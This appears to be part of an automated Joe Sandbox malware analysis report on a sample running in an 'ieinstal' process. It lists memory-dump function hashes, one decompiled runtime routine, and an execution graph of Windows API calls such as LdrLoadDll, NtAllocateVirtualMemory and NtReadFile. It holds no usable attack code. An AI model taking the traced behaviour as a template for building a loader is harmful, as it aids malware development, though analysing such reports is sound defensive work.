                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16deb36f73e054b2485c595232486af5a0a0a79ee03ee47d421836e88c090bde
                                                            • Instruction ID: 114459adca00bdd08cb99d6bdc4ba6c92f81de8560b90069ad61065f0226c71b
                                                            • Opcode Fuzzy Hash: 16deb36f73e054b2485c595232486af5a0a0a79ee03ee47d421836e88c090bde
                                                            • Instruction Fuzzy Hash: AA90026160500613D140715A581870A052557D0649FE1D111E1014514DDA998A95B6E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC998A0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc0552f2bf5a74366678f8e9dd7ffb928330a517c89117f713b01d4fa175947b
                                                            • Instruction ID: d59a0426bab44f6729c36a49339597a1dd2a8f8b994adc6fdde1e821b579f8f1
                                                            • Opcode Fuzzy Hash: dc0552f2bf5a74366678f8e9dd7ffb928330a517c89117f713b01d4fa175947b
                                                            • Instruction Fuzzy Hash: 5990026130100613D102615A481460A051997D178DFE1C112E2414515D9A658993F172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC9B040 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: feb48f1f1eb6d42d5aacdcb901b3bc00ace7d2cbf41b118364bc9a954f2efb16
                                                            • Instruction ID: f6d1a5b07f7bc7be78e4a826daee959f69f8cd7b70c799b2ff84910981a5b3e9
                                                            • Opcode Fuzzy Hash: feb48f1f1eb6d42d5aacdcb901b3bc00ace7d2cbf41b118364bc9a954f2efb16
                                                            • Instruction Fuzzy Hash: 439002A1601142534540B15A4C0440A552567E17493E1C221E1444520C9AA88895E2A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99820 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 658a32ea53ecb2bdfa0d086afbcd1aa1edb7f4363916a959caa0a252d2ce57a2
                                                            • Instruction ID: 1926e8ceabeeecbc116fac70740524d87a86e5fe2bfa1a03da89e66af56f988d
                                                            • Opcode Fuzzy Hash: 658a32ea53ecb2bdfa0d086afbcd1aa1edb7f4363916a959caa0a252d2ce57a2
                                                            • Instruction Fuzzy Hash: C190027124100613D141715A480460A051967D0689FE1C112E1414514E9A958A96FAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC999D0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac4dc5b9558cef0709d47fbb02a73c01579f47f510f18a7ad31e401c20684573
                                                            • Instruction ID: a672446bde1404a31f9be16a7f7c34b36fd4568d43e59d986ad169aec73567ed
                                                            • Opcode Fuzzy Hash: ac4dc5b9558cef0709d47fbb02a73c01579f47f510f18a7ad31e401c20684573
                                                            • Instruction Fuzzy Hash: A39002A121100253D104615A480470A055557E1649FE1C112E3144514CD9698CA1A165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC995D0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23a2e57ee62384153fd541874238de9ca2659b34f0b05dcffea0e7a7e6dceeda
                                                            • Instruction ID: 10338d06f6e5908923bdc1582c0dddf5af44d82225b916e6681843287461de13
                                                            • Opcode Fuzzy Hash: 23a2e57ee62384153fd541874238de9ca2659b34f0b05dcffea0e7a7e6dceeda
                                                            • Instruction Fuzzy Hash: 109002A1202002134105715A481461A451A57E0649BE1C121E2004550DD96588D1B165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC995F0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c98ca430fd8f7b5c28d48f08acb22e99bb1958688ab473bf0431aac26f0d9507
                                                            • Instruction ID: b1774e5958efe331e625ccaddd84a2c7aa1512c0b0979f82c086eb39c981defa
                                                            • Opcode Fuzzy Hash: c98ca430fd8f7b5c28d48f08acb22e99bb1958688ab473bf0431aac26f0d9507
                                                            • Instruction Fuzzy Hash: F390027120100A13D104615A4C0468A051557D0749FE1C111E7014615EAAA588D1B171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99950 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 06b44a6537559c80f96dade22c43d2a3b6071b75802eb9ad4dae83e6ba501b85
                                                            • Instruction ID: 48a24da62d3d3765f8d32eaf642c882bed527dce739c79864ecfe0435dc0ac80
                                                            • Opcode Fuzzy Hash: 06b44a6537559c80f96dade22c43d2a3b6071b75802eb9ad4dae83e6ba501b85
                                                            • Instruction Fuzzy Hash: 139002A120140613D140655A4C0460B051557D074AFE1C111E3054515E9E698C91B175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99560 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 355f54790beec320517c6021df6fc33f59d39acdbc7bb3d17a129e1fb6540603
                                                            • Instruction ID: bf677a45984db248e791f09c7dc0bcb8f55e7c9c8583700e2cf8d14e549e8f31
                                                            • Opcode Fuzzy Hash: 355f54790beec320517c6021df6fc33f59d39acdbc7bb3d17a129e1fb6540603
                                                            • Instruction Fuzzy Hash: 31900265221002130145A55A0A0450F095567D67993E1C115F2406550CDA6188A5A361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d7f0b64c848c65dee97f57e542e55a7bdbba43e0603bb6ba4ae9986c4cb7082
                                                            • Instruction ID: 05f6c47e61a44b68e67eab76dcf3af8b0873e225019057dcc7ed57c5b38c9693
                                                            • Opcode Fuzzy Hash: 6d7f0b64c848c65dee97f57e542e55a7bdbba43e0603bb6ba4ae9986c4cb7082
                                                            • Instruction Fuzzy Hash: 2F9002E1201142A34500A25A8804B0E4A1557E0649BE1C116E2044520CD9658891E175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC9AD30 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6596a01de411ad96e21903b47a9eaf912cd69cf95286521347d6a8326a004d8a
                                                            • Instruction ID: c155e412272b19f48c873d80cf568eb3121b7c5663b40c2e202fb2053a0cf73b
                                                            • Opcode Fuzzy Hash: 6596a01de411ad96e21903b47a9eaf912cd69cf95286521347d6a8326a004d8a
                                                            • Instruction Fuzzy Hash: C0900271A05002239140715A4C1464A451667E0B89BE5C111E1504514C9D948A95A3E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 1a55495ce3a36a93349ee1ed73704781fd7c7026463a468b1f4ea4a80809aca3
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECEFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E1ECEFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1EC9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1ECE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1ECE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                            0x1ecefdda
                                                            0x1ecefde2
                                                            0x1ecefde5
                                                            0x1ecefdec
                                                            0x1ecefdfa
                                                            0x1ecefdff
                                                            0x1ecefe0a
                                                            0x1ecefe0f
                                                            0x1ecefe17
                                                            0x1ecefe1e
                                                            0x1ecefe19
                                                            0x1ecefe19
                                                            0x1ecefe19
                                                            0x1ecefe20
                                                            0x1ecefe21
                                                            0x1ecefe22
                                                            0x1ecefe25
                                                            0x1ecefe40

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1ECEFDFA
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1ECEFE01
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1ECEFE2B
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: 644b89fbca744cd6446ad732681fe079e3cec0cb8ffe5482e405daf54146031f
                                                            • Instruction ID: 6fab0c472af5cea31f0b27efcd3e939626daeb60d7457068bae92639733151fb
                                                            • Opcode Fuzzy Hash: 644b89fbca744cd6446ad732681fe079e3cec0cb8ffe5482e405daf54146031f
                                                            • Instruction Fuzzy Hash: 04F0F676500141BFE6240A56DC02F63BF6BEB44730F240314F628566D1EE62F87096F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:6.9%
                                                            Dynamic/Decrypted Code Coverage:1.7%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:1050
                                                            Total number of Limit Nodes:148
                                                            execution_graph 31421 2a29080 31432 2a2bd40 31421->31432 31423 2a2919c 31424 2a290bb 31424->31423 31435 2a1acf0 31424->31435 31428 2a29120 Sleep 31431 2a2910d 31428->31431 31431->31423 31431->31428 31444 2a28ca0 LdrLoadDll 31431->31444 31445 2a28eb0 LdrLoadDll 31431->31445 31446 2a2a540 31432->31446 31434 2a2bd6d 31434->31424 31436 2a1ad14 31435->31436 31437 2a1ad50 LdrLoadDll 31436->31437 31438 2a1ad1b 31436->31438 31437->31438 31439 2a24e50 31438->31439 31440 2a24e5e 31439->31440 31442 2a24e6a 31439->31442 31440->31442 31453 2a252d0 LdrLoadDll 31440->31453 31442->31431 31443 2a24fbc 31443->31431 31444->31431 31445->31431 31449 2a2af60 31446->31449 31448 2a2a55c NtAllocateVirtualMemory 31448->31434 31450 2a2af70 31449->31450 31451 2a2af92 31449->31451 31452 2a24e50 LdrLoadDll 31450->31452 31451->31448 31452->31451 31453->31443 31454 3469540 LdrInitializeThunk 31458 2a2f1cd 31461 2a2b9d0 31458->31461 31462 2a2b9f6 31461->31462 31469 2a19d40 31462->31469 31464 2a2ba02 31465 2a2ba26 31464->31465 31477 2a18f30 31464->31477 31515 2a2a6b0 31465->31515 31518 2a19c90 31469->31518 31471 2a19d4d 31472 2a19d54 31471->31472 31530 2a19c30 31471->31530 31472->31464 31478 2a18f57 31477->31478 31894 2a1b1c0 31478->31894 31480 2a18f69 31898 2a1af10 31480->31898 31482 2a18f86 31489 2a18f8d 31482->31489 31991 2a1ae40 LdrLoadDll 31482->31991 31484 2a190f2 31484->31465 31486 2a18ffc 31914 2a1f410 31486->31914 31488 2a19006 31488->31484 31490 2a2bf90 2 API calls 31488->31490 31489->31484 31902 2a1f380 31489->31902 31491 2a1902a 31490->31491 31492 2a2bf90 2 API calls 31491->31492 31493 2a1903b 31492->31493 31494 2a2bf90 2 API calls 31493->31494 31495 2a1904c 31494->31495 31926 2a1ca90 31495->31926 31497 2a19059 31498 2a24a50 10 API calls 31497->31498 31499 2a19066 31498->31499 31500 2a24a50 10 API calls 31499->31500 31501 2a19077 31500->31501 31502 2a190a5 31501->31502 31503 2a19084 31501->31503 31505 2a24a50 10 API calls 31502->31505 31992 2a1d620 11 API calls 31503->31992 31511 2a190c1 31505->31511 31506 2a1908b 31993 2a1cc00 LdrLoadDll 31506->31993 31508 2a190e9 31974 2a18d00 31508->31974 31510 2a19092 31512 2a18d00 28 API calls 31510->31512 31511->31508 31936 2a1d6c0 31511->31936 31514 2a1909b 31512->31514 31514->31465 31516 2a2a6cf 31515->31516 31517 2a2af60 LdrLoadDll 31515->31517 31517->31516 31519 2a19ca3 31518->31519 31569 2a28bc0 LdrLoadDll 31518->31569 31549 2a28a70 31519->31549 31522 2a19cac 31523 2a19cb6 31522->31523 31552 2a2b2b0 31522->31552 31523->31471 31525 2a19cf3 31525->31523 31563 2a19ab0 31525->31563 31527 2a19d13 31570 2a19620 LdrLoadDll 31527->31570 31529 2a19d25 31529->31471 31531 2a19c4a 31530->31531 31532 2a2b5a0 LdrLoadDll 31530->31532 31873 2a2b5a0 31531->31873 31532->31531 31535 2a2b5a0 LdrLoadDll 31536 2a19c71 31535->31536 31537 2a1f180 31536->31537 31538 2a1f199 31537->31538 31877 2a1b040 31538->31877 31540 2a1f1ac 31881 2a2a1e0 31540->31881 31544 2a1f1d2 31547 2a1f1fd 31544->31547 31887 2a2a260 31544->31887 31546 2a2a490 2 API calls 31548 2a19d65 31546->31548 31547->31546 31548->31464 31571 2a2a600 31549->31571 31553 2a2b2c9 31552->31553 31574 2a24a50 31553->31574 31555 2a2b2e1 31556 2a2b2ea 31555->31556 31613 2a2b0f0 31555->31613 31556->31525 31558 2a2b2fe 31558->31556 31633 2a29f00 31558->31633 31851 2a17ea0 31563->31851 31565 2a19ad1 31565->31527 31566 2a19aca 31566->31565 31864 2a18160 31566->31864 31569->31519 31570->31529 31572 2a2af60 LdrLoadDll 31571->31572 31573 2a28a85 31572->31573 31573->31522 31575 2a24d85 31574->31575 31577 2a24a64 31574->31577 31575->31555 31577->31575 31641 2a29c50 31577->31641 31579 2a24b73 31746 2a2a460 LdrLoadDll 31579->31746 31580 2a24b90 31644 2a2a360 31580->31644 31583 2a24b7d 31583->31555 31584 2a24bb7 31585 2a2bdc0 2 API calls 31584->31585 31587 2a24bc3 31585->31587 31586 2a24d49 31589 2a2a490 2 API calls 31586->31589 31587->31583 31587->31586 31588 2a24d5f 31587->31588 31593 2a24c52 31587->31593 31712 2a24790 31588->31712 31590 2a24d50 31589->31590 31590->31555 31592 2a24d72 31592->31555 31594 2a24cb9 31593->31594 31596 2a24c61 31593->31596 31594->31586 31595 2a24ccc 31594->31595 31701 2a2a2e0 31595->31701 31598 2a24c66 31596->31598 31599 2a24c7a 31596->31599 31747 2a24650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31598->31747 31602 2a24c97 31599->31602 31603 2a24c7f 31599->31603 31602->31590 31659 2a24410 31602->31659 31647 2a246f0 31603->31647 31605 2a24c70 31605->31555 31608 2a24c8d 31608->31555 31611 2a24caf 31611->31555 31612 2a24d38 31612->31555 31614 2a2b101 31613->31614 31615 2a2b113 31614->31615 31616 2a2bd40 2 API calls 31614->31616 31615->31558 31617 2a2b134 31616->31617 31771 2a24070 31617->31771 31619 2a2b180 31619->31558 31620 2a2b157 31620->31619 31621 2a24070 3 API calls 31620->31621 31622 2a2b179 31621->31622 31622->31619 31805 2a2bb40 31622->31805 31625 2a2b196 31810 2a25390 31625->31810 31626 2a2b20a 31627 2a2b21a 31626->31627 31828 2a2af00 LdrLoadDll 31626->31828 31820 2a2b070 31627->31820 31630 2a2b23e 31823 2a29ec0 31630->31823 31634 2a2af60 LdrLoadDll 31633->31634 31635 2a29f1c 31634->31635 31845 346967a 31635->31845 31636 2a29f37 31638 2a2bdc0 31636->31638 31848 2a2a670 31638->31848 31640 2a2b359 31640->31525 31642 2a2af60 LdrLoadDll 31641->31642 31643 2a24b44 31642->31643 31643->31579 31643->31580 31643->31583 31645 2a2af60 LdrLoadDll 31644->31645 31646 2a2a37c NtCreateFile 31645->31646 31646->31584 31648 2a2470c 31647->31648 31649 2a2a2e0 LdrLoadDll 31648->31649 31650 2a2472d 31649->31650 31651 2a24734 31650->31651 31652 2a24748 31650->31652 31654 2a2a490 2 API calls 31651->31654 31653 2a2a490 2 API calls 31652->31653 31655 2a24751 31653->31655 31656 2a2473d 31654->31656 31748 2a2bfd0 LdrLoadDll RtlAllocateHeap 31655->31748 31656->31608 31658 2a2475c 31658->31608 31660 2a2445b 31659->31660 31661 2a2448e 31659->31661 31663 2a2a2e0 LdrLoadDll 31660->31663 31662 2a245d9 31661->31662 31666 2a244aa 31661->31666 31664 2a2a2e0 LdrLoadDll 31662->31664 31665 2a24476 31663->31665 31671 2a245f4 31664->31671 31667 2a2a490 2 API calls 31665->31667 31669 2a2a2e0 LdrLoadDll 31666->31669 31668 2a2447f 31667->31668 31668->31611 31670 2a244c5 31669->31670 31673 2a244e1 31670->31673 31674 2a244cc 31670->31674 31672 2a2a320 2 API calls 31671->31672 31675 2a2462e 31672->31675 31677 2a244e6 31673->31677 31678 2a244fc 31673->31678 31676 2a2a490 2 API calls 31674->31676 31679 2a2a490 2 API calls 31675->31679 31680 2a244d5 31676->31680 31681 2a2a490 2 API calls 31677->31681 31686 2a24501 31678->31686 31749 2a2bf90 31678->31749 31682 2a24639 31679->31682 31680->31611 31683 2a244ef 31681->31683 31682->31611 31683->31611 31694 2a24513 31686->31694 31752 2a2a410 31686->31752 31687 2a24567 31688 2a2457e 31687->31688 31760 2a2a2a0 LdrLoadDll 31687->31760 31690 2a24585 31688->31690 31691 2a2459a 31688->31691 31692 2a2a490 2 API calls 31690->31692 31693 2a2a490 2 API calls 31691->31693 31692->31694 31695 2a245a3 31693->31695 31694->31611 31696 2a245cf 31695->31696 31755 2a2bb90 31695->31755 31696->31611 31698 2a245ba 31699 2a2bdc0 2 API calls 31698->31699 31700 2a245c3 31699->31700 31700->31611 31702 2a2af60 LdrLoadDll 31701->31702 31703 2a24d14 31702->31703 31704 2a2a320 31703->31704 31705 2a2af60 LdrLoadDll 31704->31705 31706 2a2a33c 31705->31706 31764 3469770 LdrInitializeThunk 31706->31764 31707 2a24d2c 31709 2a2a490 31707->31709 31710 2a2a4ac NtClose 31709->31710 31711 2a2af60 LdrLoadDll 31709->31711 31710->31612 31711->31710 31713 2a2a2e0 LdrLoadDll 31712->31713 31714 2a247ce 31713->31714 31715 2a247d7 31714->31715 31716 2a247ec 31714->31716 31717 2a2a490 2 API calls 31715->31717 31718 2a24810 31716->31718 31719 2a2485a 31716->31719 31730 2a247e0 31717->31730 31720 2a2a3c0 2 API calls 31718->31720 31721 2a248a0 31719->31721 31722 2a2485f 31719->31722 31723 2a24835 31720->31723 31726 2a248b2 31721->31726 31732 2a249da 31721->31732 31725 2a2a410 2 API calls 31722->31725 31722->31730 31724 2a2a490 2 API calls 31723->31724 31724->31730 31728 2a2488a 31725->31728 31727 2a248b7 31726->31727 31738 2a248f2 31726->31738 31729 2a2a3c0 2 API calls 31727->31729 31731 2a2a490 2 API calls 31728->31731 31733 2a248da 31729->31733 31730->31592 31734 2a24893 31731->31734 31732->31730 31736 2a2a410 2 API calls 31732->31736 31735 2a2a490 2 API calls 31733->31735 31734->31592 31739 2a248e3 31735->31739 31737 2a24a31 31736->31737 31741 2a2a490 2 API calls 31737->31741 31738->31730 31765 2a2a3c0 31738->31765 31739->31592 31743 2a24a3a 31741->31743 31743->31592 31744 2a2a490 2 API calls 31745 2a24925 31744->31745 31745->31592 31746->31583 31747->31605 31748->31658 31751 2a2bfa8 31749->31751 31761 2a2a630 31749->31761 31751->31686 31753 2a2af60 LdrLoadDll 31752->31753 31754 2a2a42c NtReadFile 31753->31754 31754->31687 31756 2a2bbb4 31755->31756 31757 2a2bb9d 31755->31757 31756->31698 31757->31756 31758 2a2bf90 2 API calls 31757->31758 31759 2a2bbcb 31758->31759 31759->31698 31760->31688 31762 2a2af60 LdrLoadDll 31761->31762 31763 2a2a64c RtlAllocateHeap 31762->31763 31763->31751 31764->31707 31766 2a2af60 LdrLoadDll 31765->31766 31767 2a2a3dc 31766->31767 31770 3469560 LdrInitializeThunk 31767->31770 31768 2a2491a 31768->31744 31770->31768 31772 2a24081 31771->31772 31773 2a24089 31771->31773 31772->31620 31774 2a2bb40 2 API calls 31773->31774 31775 2a24093 31774->31775 31804 2a2435c 31775->31804 31829 2a2cf30 31775->31829 31777 2a240dd 31778 2a2cf30 2 API calls 31777->31778 31783 2a240e8 31778->31783 31779 2a24136 31781 2a2cf30 2 API calls 31779->31781 31785 2a2414a 31781->31785 31783->31779 31837 2a2cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 31783->31837 31838 2a2d060 31783->31838 31784 2a241a7 31786 2a2cf30 2 API calls 31784->31786 31785->31784 31787 2a2d060 3 API calls 31785->31787 31788 2a241bd 31786->31788 31787->31785 31789 2a241fa 31788->31789 31792 2a2d060 3 API calls 31788->31792 31790 2a2cf30 2 API calls 31789->31790 31791 2a24205 31790->31791 31793 2a2d060 3 API calls 31791->31793 31800 2a2423f 31791->31800 31792->31788 31793->31791 31796 2a2cf90 2 API calls 31797 2a2433e 31796->31797 31798 2a2cf90 2 API calls 31797->31798 31799 2a24348 31798->31799 31801 2a2cf90 2 API calls 31799->31801 31834 2a2cf90 31800->31834 31802 2a24352 31801->31802 31803 2a2cf90 2 API calls 31802->31803 31803->31804 31804->31620 31806 2a2bb4a 31805->31806 31806->31625 31807 2a2bb64 31806->31807 31808 2a2bf90 2 API calls 31806->31808 31807->31625 31809 2a2bbcb 31808->31809 31809->31625 31811 2a253a1 31810->31811 31812 2a24a50 10 API calls 31811->31812 31814 2a253b7 31812->31814 31813 2a2540a 31813->31626 31814->31813 31815 2a253f2 31814->31815 31816 2a25405 31814->31816 31817 2a2bdc0 2 API calls 31815->31817 31818 2a2bdc0 2 API calls 31816->31818 31819 2a253f7 31817->31819 31818->31813 31819->31626 31821 2a2bb40 2 API calls 31820->31821 31822 2a2b084 31821->31822 31822->31630 31824 2a2af60 LdrLoadDll 31823->31824 31825 2a29edc 31824->31825 31844 3469860 